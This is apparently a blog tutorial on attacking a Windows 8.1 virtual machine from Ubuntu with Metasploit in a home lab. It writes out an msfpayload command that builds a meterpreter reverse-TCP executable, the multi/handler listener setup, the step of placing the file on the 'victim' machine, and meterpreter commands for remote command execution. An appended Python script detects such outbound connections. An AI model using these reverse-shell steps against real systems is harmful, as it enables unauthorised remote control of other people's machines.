Hello again..
This post is a continuation of my previous post http://piu28.blogspot.in/2015/05/installing-metasploit-framework-on.html in which I discussed the installation of Metasploit Framework on an Ubuntu virtual machine. Let me remind you that I have created two virtual machines: Ubuntu 14.10 and Windows 8.1. What I am gonna do now is "Attacking Windows machine from Ubuntu through the use of Metasploit".
Run both of the machines through Virtual Machine Manager.
Checking the IP address of the Ubuntu 14.10 machine by running the command "ifconfig" from the terminal:
Checking the IP address of the Windows 8.1 machine by running the command "ipconfig" from the command prompt:
So, the IP address of my Ubuntu virtual machine is 192.168.122.250 and the IP address of my Windows virtual machine is 192.168.122.205.
Now, from Ubuntu, run the following command in the root terminal:
$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.122.250 LPORT=4444 x > /home/priyanka/Desktop/reverse_tcp.exe
It created an executable file on my Desktop. Now, move this executable file to the victim's machine, i.e. the Windows machine (in my case), either by uploading it online or by transferring it through some device.
So now, I have the executable file, i.e. reverse_tcp.exe, on my Windows virtual machine.
Again, go back to the Ubuntu machine and run the command "msfconsole" (without the quotation marks) from the root terminal.
The Metasploit Framework will load.
Run the commands as follows:
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set LHOST 192.168.122.250 (i.e. the IP address of the attacking machine)
- set LPORT 4444
- show options (optional)
- exploit
After running exploit, the handler waits for a connection. Go to the Windows virtual machine and run reverse_tcp.exe. A meterpreter session will open up as shown:
That's all you need: "a meterpreter session" (http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics). The power of meterpreter lies in its commands. I have used only a few:
- getuid: displays the user that the Meterpreter server is running as on the host.
- ipconfig: displays the network interfaces and addresses on the remote machine.
- ps: displays a list of running processes on the target.
- sysinfo: displays the system information.
- execute: runs a command on the target.
It will provide access to the command prompt of the Windows machine.
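Seen from the Windows VM, the session above is an outbound TCP connection from reverse_tcp.exe to 192.168.122.250:4444. As an added example (not part of the original post), this Python script joins `netstat -ano -p tcp` and `tasklist /fo csv /nh` output to flag such connections; the sample output, the PIDs and the expected-port list are constructed assumptions.

```python
import csv
import io

# Constructed sample: `netstat -ano -p tcp` output as it could look on the
# Windows VM (192.168.122.205) while the session is open. PIDs are made up.
NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       716
  TCP    192.168.122.205:49172  203.0.113.10:443       ESTABLISHED     2204
  TCP    192.168.122.205:49188  192.168.122.250:4444   ESTABLISHED     3312
  TCP    127.0.0.1:49190        127.0.0.1:5357         ESTABLISHED     4
"""

# Constructed sample: `tasklist /fo csv /nh` output for the same PIDs.
TASKLIST = '''\
"svchost.exe","716","Services","0","8,112 K"
"iexplore.exe","2204","Console","1","61,300 K"
"reverse_tcp.exe","3312","Console","1","4,896 K"
"System","4","Services","0","272 K"
'''

# Assumption: remote ports this lab host is expected to reach; tune per environment.
EXPECTED_REMOTE_PORTS = {53, 80, 443}


def pid_names(tasklist_csv):
    """Map PID -> image name from tasklist CSV output."""
    return {int(row[1]): row[0] for row in csv.reader(io.StringIO(tasklist_csv)) if row}


def suspicious_outbound(netstat_text, tasklist_csv, expected=EXPECTED_REMOTE_PORTS):
    """Return ESTABLISHED TCP connections to non-loopback hosts on unexpected ports."""
    names = pid_names(tasklist_csv)
    hits = []
    for line in netstat_text.splitlines():
        f = line.split()
        # Skip the header, listeners and anything that is not an open TCP session.
        if len(f) != 5 or f[0] != "TCP" or f[3] != "ESTABLISHED":
            continue
        host, _, port = f[2].rpartition(":")
        if host.startswith("127.") or int(port) in expected:
            continue
        pid = int(f[4])
        hits.append({"remote": f[2], "pid": pid, "image": names.get(pid, "unknown")})
    return hits


if __name__ == "__main__":
    for hit in suspicious_outbound(NETSTAT, TASKLIST):
        print(hit)
```

Because LPORT is configurable, the check keys on ports outside the expected set rather than on 4444 itself.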
Hope it helps someone get started with Metasploit meterpreter..!! Do let me know if it does..!!
This is for educational purposes only.
Thank you..!! :-)